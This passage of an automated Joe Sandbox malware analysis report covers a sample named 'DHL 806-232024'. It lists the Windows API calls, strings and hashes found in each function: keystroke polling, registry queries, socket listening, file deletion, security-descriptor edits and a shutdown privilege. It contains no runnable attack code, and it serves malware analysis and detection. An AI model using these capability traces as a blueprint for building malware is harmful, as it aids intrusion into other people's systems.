                                                                                  • Opcode ID: 562cf2674d2d4b4ee61eed27b1e62412193d33f2f0ca89129c70a423a16dcee7
                                                                                  • Instruction ID: 385f3f936b3fe071c017cf7447c746325f29cc884df6aba658f8ecbd0b1f8606
                                                                                  • Opcode Fuzzy Hash: 562cf2674d2d4b4ee61eed27b1e62412193d33f2f0ca89129c70a423a16dcee7
                                                                                  • Instruction Fuzzy Hash: 5931C2729012196ADB10AB65ECACAEF77AC9F49365F200175F914E31B0DB34DE84DF60
                                                                                  APIs
                                                                                    • Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
                                                                                    • Part of subcall function 0092874A: GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
                                                                                    • Part of subcall function 0092874A: GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
                                                                                    • Part of subcall function 0092874A: HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
                                                                                    • Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D
                                                                                    • Part of subcall function 009287E7: GetProcessHeap.KERNEL32(00000008,00928240,00000000,00000000,?,00928240,?), ref: 009287F3
                                                                                    • Part of subcall function 009287E7: HeapAlloc.KERNEL32(00000000,?,00928240,?), ref: 009287FA
                                                                                    • Part of subcall function 009287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00928240,?), ref: 0092880B
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0092825B
                                                                                  • _memset.LIBCMT ref: 00928270
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092828F
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009282A0
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009282DD
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009282F9
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00928316
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00928325
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0092832C
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092834D
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00928354
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00928385
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009283AB
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009283BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  • Opcode ID: 9ee18397c5c45e0c2331a7764782a7428876ec3604c56e95501c8b0b43564e7c
                                                                                  • Instruction ID: e6e730f4d6fb5248252aec7a5d76be97ad09da0d00115daa63acff7a510c5ed6
                                                                                  • Opcode Fuzzy Hash: 9ee18397c5c45e0c2331a7764782a7428876ec3604c56e95501c8b0b43564e7c
                                                                                  • Instruction Fuzzy Hash: AF616A71905219EFDF00DFA5EC98AEEBBB9FF04710F188129F815A7291DB319A05DB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                  • API String ID: 0-4052911093
                                                                                  • Opcode ID: d2429f5dc1fa859d8c01f4adcd3fc8dca81174f4835cbaa3b6ec18e61aaafa42
                                                                                  • Instruction ID: 2cb210ca25d5eb902f4529add3bcf9679f135e71f96bde00bb37ce117b0d8ef6
                                                                                  • Opcode Fuzzy Hash: d2429f5dc1fa859d8c01f4adcd3fc8dca81174f4835cbaa3b6ec18e61aaafa42
                                                                                  • Instruction Fuzzy Hash: B172A271E00269DBDB24DF59D8807AEB7F5FF69310F14816AE849EB284E7309D91CB90
                                                                                  APIs
                                                                                    • Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950737
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009507D6
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0095086E
                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00950AAD
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00950ABA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1240663315-0
                                                                                  • Opcode ID: b7dd666db2bf3ad571d338538e6ee4828b0e4468470661e9083fe9323ea5328c
                                                                                  • Instruction ID: 2fc98319bc2b73ec4307b94dd4a6980fa76617befbc8545854c092d2fb8f22d1
                                                                                  • Opcode Fuzzy Hash: b7dd666db2bf3ad571d338538e6ee4828b0e4468470661e9083fe9323ea5328c
                                                                                  • Instruction Fuzzy Hash: 7AE13171604310AFCB14DF29C895E6ABBE8FF89714F04896DF899D7262DA30ED05CB52
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00930241
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 009302C2
                                                                                  • GetKeyState.USER32(000000A0), ref: 009302DD
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 009302F7
                                                                                  • GetKeyState.USER32(000000A1), ref: 0093030C
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00930324
                                                                                  • GetKeyState.USER32(00000011), ref: 00930336
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0093034E
                                                                                  • GetKeyState.USER32(00000012), ref: 00930360
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00930378
                                                                                  • GetKeyState.USER32(0000005B), ref: 0093038A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 4f917f632f07b0f260cf14d422ddc5956073888951a2dd71f082f7d9e35083b3
                                                                                  • Instruction ID: 6326b42d775799a1dda46e320bd05ba73825e244d91766c5dab46e004a4d03e6
                                                                                  • Opcode Fuzzy Hash: 4f917f632f07b0f260cf14d422ddc5956073888951a2dd71f082f7d9e35083b3
                                                                                  • Instruction Fuzzy Hash: 3A41B9645087C96EFF319A6488283B6BEA9BF92340F08409DD5D6471C2EBD55DC4CFA2
                                                                                  APIs
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  • CoInitialize.OLE32 ref: 00948718
                                                                                  • CoUninitialize.OLE32 ref: 00948723
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00962BEC,?), ref: 00948783
                                                                                  • IIDFromString.OLE32(?,?), ref: 009487F6
                                                                                  • VariantInit.OLEAUT32(?), ref: 00948890
                                                                                  • VariantClear.OLEAUT32(?), ref: 009488F1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                  • API String ID: 834269672-1287834457
                                                                                  • Opcode ID: b56b43abe67bf895b5ae8518329356f937cd46360170741d5181e758796dda33
                                                                                  • Instruction ID: 3924aabd4e059e730fb84b1f8b8ce5a3c4bd333f8c29c577208e9de06464d771
                                                                                  • Opcode Fuzzy Hash: b56b43abe67bf895b5ae8518329356f937cd46360170741d5181e758796dda33
                                                                                  • Instruction Fuzzy Hash: 37616770608301AFD710DF64C898E6FBBE8AF88714F10491AF9959B391DB74ED48CB92
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1737998785-0
                                                                                  • Opcode ID: e89b880b2c9b20db2b0759dab93f62ac2f7ce94a0c1f229a5a1848914778e1d2
                                                                                  • Instruction ID: e1322b11137598c9c3ca75d4520d03a0bc0f51181492293b75d86667c6315b4a
                                                                                  • Opcode Fuzzy Hash: e89b880b2c9b20db2b0759dab93f62ac2f7ce94a0c1f229a5a1848914778e1d2
                                                                                  • Instruction Fuzzy Hash: E321AE35215224AFDB10AF25EC19F6E7BA8FF44722F10802AF946DB2B1CB35AC00DB55
                                                                                  APIs
                                                                                    • Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE
                                                                                    • Part of subcall function 00934CD3: GetFileAttributesW.KERNEL32(?,00933947), ref: 00934CD4
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00933ADF
                                                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00933B87
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00933B9A
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00933BB7
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00933BD9
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00933BF5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 4002782344-1173974218
                                                                                  • Opcode ID: 68603b36f716f7d758e1c9e225d9c45e72a7d4993db738acc4dc3393411ad229
                                                                                  • Instruction ID: ea5e4b567d3f0b6a9ce3f2b1499de0b4b4d9c4e74f7ea706c26436f1ed370517
                                                                                  • Opcode Fuzzy Hash: 68603b36f716f7d758e1c9e225d9c45e72a7d4993db738acc4dc3393411ad229
                                                                                  • Instruction Fuzzy Hash: C55160318452599ACF15EBA4CD929FDB7B9EF14300F64826AE442B7191EF306F09CF61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %s%u$ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                  • API String ID: 0-2149088777
                                                                                  • Opcode ID: f8f13be8e42c035ef07eb6fe6b2f081b392b0a41965f2b8a8f3da4b5d7fc2299
                                                                                  • Instruction ID: 474b097fe9709529bd1e0a15d341f54804d27cd93056f1a838f1bf80cb978821
                                                                                  • Opcode Fuzzy Hash: f8f13be8e42c035ef07eb6fe6b2f081b392b0a41965f2b8a8f3da4b5d7fc2299
                                                                                  • Instruction Fuzzy Hash: 8DA27A74A0425E8BDF24CF59C9807EEB7B1FB56314F2491AAD85AE7280D7309EC5DB80
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0093F6AB
                                                                                  • Sleep.KERNEL32(0000000A), ref: 0093F6DB
                                                                                  • _wcscmp.LIBCMT ref: 0093F6EF
                                                                                  • _wcscmp.LIBCMT ref: 0093F70A
                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 0093F7A8
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093F7BE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                  • String ID: *.*
                                                                                  • API String ID: 713712311-438819550
                                                                                  • Opcode ID: 172da1fa3c0971d243467e9bb92ba2f786b94d24d73b8d970d722686764af726
                                                                                  • Instruction ID: 5f9de1f7afcfa30623b9828b0faad4a949b430658d3b0c3829752c6609bd9414
                                                                                  • Opcode Fuzzy Hash: 172da1fa3c0971d243467e9bb92ba2f786b94d24d73b8d970d722686764af726
                                                                                  • Instruction Fuzzy Hash: 6F416D71D0421A9BDF11EF64CC95EEEBBB8FF05314F144566E819A22A0EB309E44CF91
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: a6416dd51b0e3d1f6db78860a0f43478df9ef02aa56f99964aa2b5807b8a065d
                                                                                  • Instruction ID: e333aaee721e609c57b45a4aff371045eedc09e536e5d7a92461db0bb6ef30a9
                                                                                  • Opcode Fuzzy Hash: a6416dd51b0e3d1f6db78860a0f43478df9ef02aa56f99964aa2b5807b8a065d
                                                                                  • Instruction Fuzzy Hash: E212BB70A00619DFDF14DFA9D981AAEB7F5FF88304F104229E406E7296EB35AD11CB51
                                                                                  APIs
                                                                                    • Part of subcall function 00928CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
                                                                                    • Part of subcall function 00928CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
                                                                                    • Part of subcall function 00928CC3: GetLastError.KERNEL32 ref: 00928D47
                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 0093549B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                  • API String ID: 2234035333-194228
                                                                                  • Opcode ID: ac19edf39cc9dd1d5ba1b2c6933349d848efad085edc48f72bb567f087e4a893
                                                                                  • Instruction ID: 36d5b986a4e6b5e8950304ba3fa1229cd3290aa03f02298350abca22654376de
                                                                                  • Opcode Fuzzy Hash: ac19edf39cc9dd1d5ba1b2c6933349d848efad085edc48f72bb567f087e4a893
                                                                                  • Instruction Fuzzy Hash: 9F01F7316A5B116AE72C6774EC4EBBB729CEB48353F250521FD47D20E3EA945C808A90
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009465EF
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009465FE
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 0094661A
                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00946629
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00946643
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00946657
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                  • String ID:
                                                                                  • API String ID: 1279440585-0
                                                                                  • Opcode ID: bfddb2b2b03f992b2eeebbb9d557500f6487fc4a12c017d9df210a1ff5d51781
                                                                                  • Instruction ID: 64e7cb7f1850f2e7a4d391becbc31b813ec6a7d8bf882aca474b1933fb54d62b
                                                                                  • Opcode Fuzzy Hash: bfddb2b2b03f992b2eeebbb9d557500f6487fc4a12c017d9df210a1ff5d51781
                                                                                  • Instruction Fuzzy Hash: 21219E71200210AFCB10AF28D859F6EB7A9EF49721F15825AF956E73D1CB70AD01DB52
                                                                                  APIs
                                                                                    • Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
                                                                                    • Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041
                                                                                  • _memmove.LIBCMT ref: 0092062F
                                                                                  • _memmove.LIBCMT ref: 00920744
                                                                                  • _memmove.LIBCMT ref: 009207EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1300846289-0
                                                                                  • Opcode ID: 36edcb9fbbcd49b154c8c2684fcea5d2ec7d18b7231a8d9f777637b8afae2775
                                                                                  • Instruction ID: 149bf06bd884185c3646c306f479399120ab2c0668eeef393e4c471b067a67e2
                                                                                  • Opcode Fuzzy Hash: 36edcb9fbbcd49b154c8c2684fcea5d2ec7d18b7231a8d9f777637b8afae2775
                                                                                  • Instruction Fuzzy Hash: 6C029F70A00219DFDF04DF69E981AAE7BB5FF84304F148069E806DB396EB35DA54CB91
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 008D19FA
                                                                                  • GetSysColor.USER32(0000000F), ref: 008D1A4E
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 008D1A61
                                                                                    • Part of subcall function 008D1290: DefDlgProcW.USER32(?,00000020,?), ref: 008D12D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorProc$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3744519093-0
                                                                                  • Opcode ID: 9bdecfb8912e7fd60ed44b4007fbd47173bdffaca32a0fbf1ecfe27aebba7553
                                                                                  • Instruction ID: fabf5b1bc1af014d2824ec947adc0b863d91199c18926d99ff70efadb9857803
                                                                                  • Opcode Fuzzy Hash: 9bdecfb8912e7fd60ed44b4007fbd47173bdffaca32a0fbf1ecfe27aebba7553
                                                                                  • Instruction Fuzzy Hash: E0A125B1115668BEEE28AA2E9C5CE7B379CFF82746B14031BF442D63D5CA148C0192B2
                                                                                  APIs
                                                                                    • Part of subcall function 009480A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB
                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00946AB1
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00946ADA
